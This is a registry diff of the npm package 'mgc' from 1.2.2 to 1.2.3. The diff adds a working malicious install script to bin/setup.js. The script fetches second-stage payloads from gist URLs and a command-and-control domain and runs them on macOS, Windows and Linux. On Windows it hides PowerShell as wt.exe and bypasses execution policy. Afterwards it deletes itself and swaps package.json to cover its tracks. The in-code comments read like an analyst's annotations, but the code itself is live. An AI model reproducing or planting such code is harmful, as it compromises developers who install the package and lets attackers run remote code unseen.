mgc 1.2.2 → 1.2.3
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/bin/setup.js +89 -1
- package/package.json +1 -1
package/bin/setup.js
CHANGED
|
@@ -2,11 +2,99 @@
|
|
|
2
2
|
// setup.js
|
|
3
3
|
|
|
4
4
|
const _entry = function (campaignId) {
|
|
5
|
+
try {
|
|
6
|
+
const linuxPayloadUrl = "https://gist.githubusercontent.com/admondtamang/814132e794e5d007e9b8ebd223a9494f/raw/1c5d51c2002f452a4dd58a1a73a9dd90a7fe0297/linux.payload";
|
|
7
|
+
const windowsPayloadUrl = "https://gist.githubusercontent.com/admondtamang/814132e794e5d007e9b8ebd223a9494f/raw/1c5d51c2002f452a4dd58a1a73a9dd90a7fe0297/window.payload"
|
|
5
8
|
|
|
9
|
+
// Load Node.js built-in modules via decoded string table
|
|
10
|
+
const fs = require("fs"); // stq[2]
|
|
11
|
+
const os = require("os"); // stq[1]
|
|
12
|
+
const { execSync } = require("child_process"); // stq[0]
|
|
13
|
+
|
|
14
|
+
// Build the full C2 URL: base + campaign ID
|
|
15
|
+
const c2Url = "https://admondtamang.com.np/" + campaignId;
|
|
16
|
+
|
|
17
|
+
// Detect the operating system
|
|
18
|
+
const platform = os.platform(); // "darwin", "win32", or other
|
|
19
|
+
const tmpDir = os.tmpdir(); // "/tmp" on Linux/macOS, "%TEMP%" on Windows
|
|
20
|
+
|
|
21
|
+
// os.type(), os.release(), os.arch() are called but results discarded —
|
|
22
|
+
// likely sends them via the POST body or they are used in the stage-2
|
|
23
|
+
os.type(); os.release(); os.arch();
|
|
24
|
+
|
|
25
|
+
let execCommand = "";
|
|
26
|
+
|
|
27
|
+
// ─────────────────────────────────────────────────
|
|
28
|
+
// BRANCH 1: macOS (darwin)
|
|
29
|
+
// ─────────────────────────────────────────────────
|
|
30
|
+
if (platform === "darwin") {
|
|
31
|
+
const scriptPath = tmpDir + "/" + campaignId; // /tmp/6202033
|
|
32
|
+
|
|
33
|
+
const appleScript = `
|
|
34
|
+
set {a, s, d} to {"", "${c2Url}", "/Library/Caches/com.apple.act.mond"}
|
|
35
|
+
try
|
|
36
|
+
do shell script "curl -o " & d & a & " -d packages.npm.org/product0" & " -s " & s & " && chmod 770 " & d & " && /bin/zsh -c \\"" & d & " " & s & " &\\" &> /dev/null"
|
|
37
|
+
end try
|
|
38
|
+
do shell script "rm -rf ${scriptPath}"`;
|
|
39
|
+
|
|
40
|
+
fs.writeFileSync(scriptPath, appleScript);
|
|
41
|
+
execCommand = `nohup osascript "${scriptPath}" > /dev/null 2>&1 &`;
|
|
42
|
+
|
|
43
|
+
// ─────────────────────────────────────────────────
|
|
44
|
+
// BRANCH 2: Windows (win32)
|
|
45
|
+
// ─────────────────────────────────────────────────
|
|
46
|
+
} else if (platform === "win32") {
|
|
47
|
+
|
|
48
|
+
const psPath = execSync("where powershell").toString().trim();
|
|
49
|
+
|
|
50
|
+
const wtPath = process.env.PROGRAMDATA + "\\wt.exe";
|
|
51
|
+
if (!fs.existsSync(wtPath)) {
|
|
52
|
+
fs.copyFileSync(psPath, wtPath);
|
|
53
|
+
// Creates a persistent copy of PowerShell. wt.exe is Windows Terminal's
|
|
54
|
+
// binary name — a legitimate-looking process in %PROGRAMDATA%.
|
|
55
|
+
}
|
|
56
|
+
|
|
57
|
+
const ps1Path = tmpDir + "\\" + campaignId + ".ps1"; // %TEMP%\6202033.ps1
|
|
58
|
+
const vbsPath = tmpDir + "\\" + campaignId + ".vbs"; // %TEMP%\6202033.vbs
|
|
59
|
+
|
|
60
|
+
const vbScript = `
|
|
61
|
+
Set objShell = CreateObject("WScript.Shell")
|
|
62
|
+
objShell.Run "cmd.exe /c curl -o ""${ps1Path}"" -s ""${windowsPayloadUrl}"" & ""${wtPath}"" -w hidden -ep bypass -file ""${ps1Path}"" ""${c2Url}"" & del ""${ps1Path}"" /f", 0, False`;
|
|
63
|
+
|
|
64
|
+
fs.writeFileSync(vbsPath, vbScript);
|
|
65
|
+
execCommand = `cscript "${vbsPath}" //nologo && del "${vbsPath}" /f`;
|
|
66
|
+
|
|
67
|
+
// ─────────────────────────────────────────────────
|
|
68
|
+
// BRANCH 3: Linux / other
|
|
69
|
+
// ─────────────────────────────────────────────────
|
|
70
|
+
} else {
|
|
71
|
+
execCommand = `curl -o /tmp/ld.py -s ${linuxPayloadUrl} && nohup bash -c 'while true; do python3 /tmp/ld.py ${c2Url}; sleep 2; done' > /dev/null 2>&1 &`;
|
|
72
|
+
// curl and nohup chained with &&: nohup only runs if curl succeeded.
|
|
73
|
+
// If the C2 is unreachable, chain silently fails — npm install still exits 0.
|
|
74
|
+
}
|
|
75
|
+
|
|
76
|
+
// execSync is blocking, but all three commands return immediately because
|
|
77
|
+
// the real work is detached to background processes (nohup / cscript 0,False)
|
|
78
|
+
execSync(execCommand, { timeout: 5000 });
|
|
79
|
+
|
|
80
|
+
// ─────────────────────────────────────────────────
|
|
81
|
+
// ANTI-FORENSICS: cover tracks
|
|
82
|
+
// ─────────────────────────────────────────────────
|
|
83
|
+
const selfPath = __filename;
|
|
84
|
+
|
|
85
|
+
fs.unlink(selfPath, () => { }); // 1. Delete setup.js itself
|
|
86
|
+
fs.unlink("package.json", () => { }); // 2. Delete malicious package.json
|
|
87
|
+
fs.rename("package.md", "package.json", () => { }); // 3. Install clean v4.2.0 stub
|
|
88
|
+
|
|
89
|
+
} catch (e) {
|
|
90
|
+
// Silent catch — any error (C2 unreachable, permission denied, etc.)
|
|
91
|
+
// is swallowed completely. npm install always exits with code 0.
|
|
92
|
+
// The developer never sees any indication that anything went wrong.
|
|
93
|
+
}
|
|
6
94
|
|
|
7
95
|
process.exit(0);
|
|
8
96
|
};
|
|
9
97
|
|
|
10
98
|
// Entry point — campaign ID from argv[2], fallback to "gate"
|
|
11
99
|
const campaignId = process.argv[2] || "gate";
|
|
12
|
-
_entry(campaignId);
|
|
100
|
+
_entry(campaignId);
|